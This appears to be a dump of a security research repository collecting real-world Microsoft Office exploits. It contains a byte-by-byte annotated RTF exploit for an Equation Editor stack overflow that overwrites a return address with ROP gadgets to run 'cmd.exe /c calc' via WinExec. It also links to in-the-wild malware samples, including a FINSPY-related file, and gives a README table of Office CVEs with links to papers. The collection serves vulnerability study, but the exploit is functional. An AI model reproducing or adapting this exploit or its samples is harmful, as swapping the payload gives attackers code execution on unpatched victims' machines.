000000000000000000000000001500000057040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001302C00360421C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFFE2250A7A00000A0000000000040000002D0102000B000000320A4C05503C0800000031313131313131310C000000320A4C05D0340A000000313131313131313131310C000000320A4C05502D0A000000313131313131313131310C000000320A4C05D0250A000000313131313131313131310C000000320A4C05501E0A000000313131313131313131310C000000320A4C05D0160A000000313131313131313131310C000000320A4C05500F0A000000313131313131313131310C000000320A4C05D0070A000000313131313131313131310C000000320A4C0550000A000000313131313131313131310B000000320A8403503C0800000031313131313131310C000000320A8403D0340A000000313131313131313131310C000000320A8403502D0A000000313131313131313131310C000000320A8403D0250A000000313131313131313131310C000000320A8403501E0A000000313131313131313131310C000000320A8403D0160A000000313131313131313131310C000000320A8403500F0A000000313131313131313131310C000000320A8403D0070A000000313131313131313131310C000000320A840350000A000000313131313131313131310B000000320A6601503C0800000031313131313131310C000000320A6601D0340A000000313131313131313131310C000000320A6601502D0A000000313131313131313131310C000000320A6601D0250A000000313131313131313131310C000000320A6601501E0A000000313131313131313131310C000000320A6601D0160A000000313131313131313131310C000000320A6601500F0A000000313131313131313131310C000000320A6601D0070A000000313131313131313131310C000000320A660150000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFFD4EF1800040000002D01030004000000F00102000300000000000000000000000000000000000000000000000000 15 | 16 | {\*\comment MTEF Header } 17 | 1C00 {\*\comment MTEF Header Size -> 0x1C = 28 } 18 | 00000200 19 | A8C4 20 | 3B040000 21 | 22 | 00000000 23 | E0A06600 24 | ECE76500 25 | 00000000 26 | 27 | 03 {\*\comment Version } 28 | 01 {\*\comment Generating Platform } 29 | 01 {\*\comment Generating Product } 30 | 03 {\*\comment Product Version } 31 | 0A {\*\comment Product Subversion } 32 | 33 | 0A {\*\comment TYPESIZE Record } 34 | 01 35 | 36 | 05 {\*\comment MATRIX Record } 37 | 01 38 | 01 39 | 01 40 | 1C {\*\comment size1 -> Copy 8 bytes to EBP-0x14 } 41 | 94 {\*\comment size2 -> Copy 38 bytes to EBP-0x0C } 42 | 43 | 636D642E {\*\comment EBP-0x14 -> "cmd." } 44 | 65786520 {\*\comment EBP-0x10 -> "exe " } 45 | 2F632063 {\*\comment EBP-0x0C -> "/c c" } 46 | 616C6300 {\*\comment EBP-0x08 -> "alc\x00" } 47 | 00000000 {\*\comment EBP-0x04 } 48 | 19000000 {\*\comment EBP-0x00: 0x19 = (0x32 / 2) } 49 | 3AC74400 {\*\comment Return Address -> Base + 0x0004C73A } {\*\asmcomment add esp, 4; retn; } 50 | 51 | 285B4500 {\*\comment Writable Address -> Base + 0x00055B28 } 52 | B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; } 53 | B60E4100 {\*\comment Increase EAX -> Base + 0x00010EB6 } {\*\asmcomment add eax, ebp; retn 2; } 54 | 0000 55 | 4BED4000 {\*\comment Push EAX and Call WinExec -> Base + 0x0000ED4B } 56 | 57 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 58 | 59 | {\*\comment End of the equation } 60 | 61 | 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 62 | 63 | 01050000 {\*\comment OLE Version } 64 | 05000000 {\*\comment Format ID -> 0x05 = Presentation Object with a ClassName } 65 | 0D000000 {\*\comment ClassName.Length -> 0x0D = 13 } 66 | 4D45544146494C455049435400734900 {\*\comment ClassName.String -> "METAFILEPICT\x00" } 67 | 68 | {\*\comment Presentation Data } 69 | 00CCF9FFFF0C04000008007349340600000100090000030202000004001C00000000000500000009020000000005000000020101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A005A0421200000026060F001A00FFFFFFFF000010000000C0FFFFFFC0FFFFFF60420000600500000B00000026060F000C004D617468547970650000C00008000000FA0200000800000000000000040000002D010000050000001402F8016000050000001302F801404208000000FA0200001000000000000000040000002D010100050000001402C0034000050000001302C00360421C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00FEFFFFFF682C0A7800000A0000000000040000002D0102000B000000320A4C05503C0800000031313131313131310C000000320A4C05D0340A000000313131313131313131310C000000320A4C05502D0A000000313131313131313131310C000000320A4C05D0250A000000313131313131313131310C000000320A4C05501E0A000000313131313131313131310C000000320A4C05D0160A000000313131313131313131310C000000320A4C05500F0A000000313131313131313131310C000000320A4C05D0070A000000313131313131313131310C000000320A4C0550000A000000313131313131313131310B000000320A8403503C0800000031313131313131310C000000320A8403D0340A000000313131313131313131310C000000320A8403502D0A000000313131313131313131310C000000320A8403D0250A000000313131313131313131310C000000320A8403501E0A000000313131313131313131310C000000320A8403D0160A000000313131313131313131310C000000320A8403500F0A000000313131313131313131310C000000320A8403D0070A000000313131313131313131310C000000320A840350000A000000313131313131313131310B000000320A6601503C0800000031313131313131310C000000320A6601D0340A000000313131313131313131310C000000320A6601502D0A000000313131313131313131310C000000320A6601D0250A000000313131313131313131310C000000320A6601501E0A000000313131313131313131310C000000320A6601D0160A000000313131313131313131310C000000320A6601500F0A000000313131313131313131310C000000320A6601D0070A000000313131313131313131310C000000320A660150000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFFD4EF1800040000002D01030004000000F0010200030000000000 70 | } 71 | } 72 | } -------------------------------------------------------------------------------- /CVE-2017-8759/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/CVE-2017-8759/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684.bin.gz -------------------------------------------------------------------------------- /CVE-2017-8759/README.md: -------------------------------------------------------------------------------- 1 | reference: 2 | [FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY](https://www.mandiant.com/resources/blog/zero-day-used-to-distribute-finspy) 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # office-exploit-case-study 2 | 3 | **update 2024.1:fix broken links** 4 | 5 | Collection of office exploit used in the real world recent years with samples and writeup,please study them in virtual machine.Take responsibility yourself if you use them for illegal purposes.Samples should match hash in corresponding writeup if mentioned. 6 | 7 | If you are looking for more poc(reported by researchers and never used in the real world),you can go to exploit-db search "microsoft office",and many researchers share their poc like https://srcincite.io/advisories/ and https://bugs.chromium.org/p/project-zero/issues/list. 8 | 9 | What did Microsoft do to make office more secure? 10 | 11 | 1.Data Execution Prevention in Office 2010 12 | 13 | 2.enforce ASLR randomization natively without any additional setting on Win7 and above, even for those DLLs not originally compiled with /DYNAMICBASE flag in Office 2013 14 | 15 | 3.disable EPS in 2017.4's patch 16 | 17 | 4.disable DDE in 2017.12's patch 18 | 19 | CVE |Type of Vuln |fix time| 20 | ------------------|-----------------------------------------|--------| 21 | CVE-2012-0158|stack overflow in ActiveX|2012.4 22 | CVE-2012-1856|use after free in ActiveX|2012.8 23 | CVE-2013-3906|array out of bounds in TIFF parser|2013.12 24 | CVE-2014-1761|array out of bounds in RTF parser|2014.4 25 | CVE-2014-4114|logic false in handling OLE object|2014.10 26 | CVE-2014-6352(patch bypass of CVE-2014-4114)|logic false in handling OLE object|2014.11 27 | CVE-2015-0097|logic false in security zone|2015.3 28 | CVE-2015-1641|type confusion in RTF parser|2015.4 29 | CVE-2015-2545|use after free in EPS parser|2015.9 30 | CVE-2016-7193|array out of bounds in RTF parser|2016.10 31 | CVE-2017-0199|logic false in Office Moniker|2017.4 32 | CVE-2017-0261|use after free in EPS parser|2017.5 33 | CVE-2017-0262|type confusion in EPS parser|2017.5 34 | CVE-2017-8570(patch bypass of CVE-2017-0199)|logic false in Office Moniker|2017.7 35 | CVE-2017-8759|logic false in .NET Framework|2017.9 36 | CVE-2017-11826|type confusion in OOXML parser|2017.10 37 | CVE-2017-11882|stack overflow in EQNEDT32.EXE|2017.11 38 | CVE-2018-0798|stack overflow in EQNEDT32.EXE|2018.1 39 | CVE-2018-0802|stack overflow in EQNEDT32.EXE|2018.1 40 | -------------------------------------------------------------------------------- /papers/Attacking Interoperability-An OLE Edition.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/Attacking Interoperability-An OLE Edition.pdf -------------------------------------------------------------------------------- /papers/Moniker Magic-Running Scripts Directly in Microsoft Office.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/Moniker Magic-Running Scripts Directly in Microsoft Office.pdf -------------------------------------------------------------------------------- /papers/OLE object are still dangerous today-Exploiting Microsoft Office.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/OLE object are still dangerous today-Exploiting Microsoft Office.pdf -------------------------------------------------------------------------------- /papers/Persisting with Microsoft Office-Abusing Extensibility Options.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/houjingyi233/office-exploit-case-study/09de49e31b83b4348c9e892bfde1ef1f597bc38a/papers/Persisting with Microsoft Office-Abusing Extensibility Options.pdf --------------------------------------------------------------------------------